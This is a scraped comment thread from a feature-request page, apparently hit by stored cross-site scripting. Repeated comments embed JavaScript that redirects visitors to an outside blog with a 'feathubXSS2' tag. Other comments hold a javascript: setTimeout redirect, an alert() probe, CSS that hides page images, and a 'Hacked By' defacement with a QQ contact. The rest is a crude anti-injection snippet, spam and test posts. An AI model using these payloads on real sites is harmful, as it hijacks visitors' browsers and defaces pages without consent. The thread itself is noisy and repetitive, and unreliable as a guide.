If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 。
If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
反注入补丁
zx775337791 commented almost 2 years ago
Tea img,svg,table{visibility: collapse;}
kevindragong commented almost 2 years ago
are you zhaoxu?
| 974297362 commented almost 2 years ago
are you zhaoxu?
| ntyangyang commented almost 2 years ago
are you zhaoxu?
| ww3651425 commented almost 2 years ago
are you zhaoxu?
| mirsQian commented almost 2 years ago
are you zhaoxu?
| alightman commented almost 2 years ago
are you zhaoxu?
CoatiFly commented almost 2 years ago
are you zhaoxu?
keepzouba commented almost 2 years ago
这不是tm相当于实名举报了,厉害
sf197 commented almost 2 years ago
sf197 commented almost 2 years ago
alert(/tasd/)
xss67612 commented almost 2 years ago
Hacked By Helen收徒QQ925999918
superzmy commented almost 2 years ago
for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }
反注入补丁 <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>
itongqingbo commented almost 2 years ago
怎么反 注入
itongqingbo commented almost 2 years ago
my test commit
itongqingbo commented almost 2 years ago
122
itongqingbo commented almost 2 years ago
test repeat sent b
q8195438 commented almost 2 years ago
for (var i=0;i
guotao commented almost 2 years ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 。
guotao commented almost 2 years ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 反注入补丁